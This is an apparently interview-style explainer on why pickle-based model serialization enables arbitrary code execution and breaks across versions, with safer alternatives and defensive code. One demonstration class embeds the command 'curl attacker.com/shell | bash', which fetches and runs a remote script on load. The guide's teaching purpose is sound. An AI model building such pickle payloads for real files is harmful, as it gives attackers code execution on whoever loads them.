datarekha
MLOps | Medium | Asked at Amazon, Google, Hugging Face

What are the security and compatibility risks of using pickle for model serialization, and what are the safer alternatives?

The short answer

Pickle can import and call arbitrary Python callables during deserialization, so loading an untrusted pickle file is equivalent to running untrusted code on your machine. Beyond security, pickle artifacts are tightly coupled to the Python and library versions used to create them, which makes them fragile across environments.

How to think about it

Python’s pickle module is the default serialization mechanism for scikit-learn models (directly or through joblib, which builds on it), and PyTorch’s torch.save uses it under the hood. Its convenience hides two fundamental problems.

Security: arbitrary code execution

Pickle works by storing a stream of opcodes for a small stack-based virtual machine, which the unpickler replays on load. Those opcodes can import any module and call any callable in it, so a malicious actor can craft a pickle file that calls os.system, exfiltrates secrets, or installs a backdoor, all triggered by a single joblib.load("model.pkl"). This is not a theoretical risk; it has been demonstrated repeatedly in ML supply chain attacks.

# Demonstration of the risk: NEVER load untrusted pickles
import os
import pickle

class Exploit:
    def __reduce__(self):
        # On load, the unpickler calls os.system with this argument
        return (os.system, ("curl attacker.com/shell | bash",))

payload = pickle.dumps(Exploit())   # building the payload runs nothing
pickle.loads(payload)               # loading it executes the command
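
One way to triage a pickle without loading it is to walk its opcode stream with the standard library's pickletools module. The sketch below is only an illustration: the risky_opcodes helper and its opcode list are assumptions made for this example, not an established scanner. Legitimate scikit-learn pickles also import classes, so a hit means "inspect further", not "malicious", and an empty result is not a safety guarantee.

```python
import os
import pickle
import pickletools

# Opcodes that import a global or call something (illustrative, not exhaustive)
SUSPICIOUS = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX"}

def risky_opcodes(data: bytes) -> set[str]:
    """Return the suspicious opcode names found in a pickle, without loading it."""
    return {op.name for op, _arg, _pos in pickletools.genops(data) if op.name in SUSPICIOUS}

class Exploit:
    def __reduce__(self):
        # Harmless stand-in command; it is never executed in this example
        return (os.system, ("echo pwned",))

payload = pickle.dumps(Exploit())                  # serialising does not run the command
plain = pickle.dumps({"weights": [0.1, 0.2]})      # plain containers and floats only

print(sorted(risky_opcodes(payload)))   # the exploit imports and calls a global
print(sorted(risky_opcodes(plain)))     # plain data needs neither
```

Because genops only parses the byte stream, nothing in the payload is imported or called during the scan.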

Compatibility: brittle across versions

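A pickle created with scikit-learn 1.3 may fail to load, or load and behave incorrectly, with scikit-learn 1.5 because internal class paths or attribute names changed; scikit-learn does not guarantee that pickles work across versions. A pickle created on Python 3.10 can also fail on Python 3.12, usually not because of the pickle protocol itself (newer interpreters can read older protocols) but because the libraries installed for the new interpreter differ. The protocol does matter in the other direction: an older interpreter cannot read a pickle written with a protocol it does not support.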
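
A common mitigation is to record the environment next to the artifact and compare it at load time. The following is a minimal sketch, assuming a JSON sidecar file is acceptable; environment_fingerprint and mismatches are hypothetical helper names, not part of any library.

```python
import json
import platform
from importlib import metadata

def environment_fingerprint(packages):
    """Collect the Python version and installed versions of the given packages."""
    versions = {}
    for name in packages:
        try:
            versions[name] = metadata.version(name)
        except metadata.PackageNotFoundError:
            versions[name] = None   # package not installed in this environment
    return {"python": platform.python_version(), "packages": versions}

def mismatches(saved, current):
    """List differences between a saved fingerprint and the current environment."""
    problems = []
    # Compare major.minor only; patch releases of Python are ignored here
    if saved["python"].split(".")[:2] != current["python"].split(".")[:2]:
        problems.append(f"python: saved {saved['python']}, current {current['python']}")
    for name, version in saved["packages"].items():
        now = current["packages"].get(name)
        if now != version:
            problems.append(f"{name}: saved {version}, current {now}")
    return problems

# At save time: write the fingerprint next to the model artifact
fingerprint = environment_fingerprint(["scikit-learn", "numpy"])
sidecar = json.dumps(fingerprint)

# At load time: compare before unpickling, and refuse or warn on differences
print(mismatches(json.loads(sidecar), environment_fingerprint(["scikit-learn", "numpy"])))
```

Exact version matching is deliberately strict; a real deployment might relax it to compatible ranges.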

Safer alternatives by use case:

Use case | Format | Tool
Cross-framework inference | ONNX | torch.onnx.export, tf2onnx
Tree models (XGBoost, LightGBM) | Native JSON/binary | model.save_model("model.json")
PyTorch weights only | state_dict + JSON config | torch.save(model.state_dict(), ...)
Scikit-learn pipelines | skops | skops.io.dump
Hugging Face models | safetensors | model.save_pretrained(...)

# Safer: save the PyTorch state dict plus a separate JSON config
import json
import torch

# Assumes `model` is a trained MyModel and `model_config` holds its constructor kwargs
torch.save(model.state_dict(), "weights.pt")
with open("config.json", "w") as f:
    json.dump(model_config, f)

# Load: reconstruct the architecture first, then load the weights
with open("config.json") as f:
    model = MyModel(**json.load(f))
model.load_state_dict(torch.load("weights.pt", weights_only=True))

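The weights_only=True flag (added in PyTorch 1.13 and the default since PyTorch 2.6) restricts the unpickler to an allowlist of tensors, primitive types, and plain containers, which blocks the arbitrary calls that pickle exploits rely on.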
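
The allowlist idea behind weights_only can be illustrated with the standard library's Unpickler.find_class hook. This is not PyTorch's implementation, only a sketch of the principle; the ALLOWED set and the safe_loads helper are assumptions made for the example.

```python
import io
import os
import pickle
from collections import OrderedDict

# Hypothetical allowlist: the only globals this unpickler may import
ALLOWED = {("collections", "OrderedDict")}

class AllowlistUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called whenever the pickle asks to import a global
        if (module, name) in ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global: {module}.{name}")

def safe_loads(data: bytes):
    return AllowlistUnpickler(io.BytesIO(data)).load()

class Exploit:
    def __reduce__(self):
        # Harmless stand-in command; the allowlist stops it before it runs
        return (os.system, ("echo pwned",))

# Plain data in an allowed container loads normally
weights = safe_loads(pickle.dumps(OrderedDict([("layer.weight", [0.1, 0.2])])))

# The exploit is rejected when the unpickler tries to import os.system
try:
    safe_loads(pickle.dumps(Exploit()))
    blocked = False
except pickle.UnpicklingError:
    blocked = True

print(weights, blocked)
```

The rejection happens at import time, before any call is made, which is why an allowlist is more robust than trying to detect specific malicious commands.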
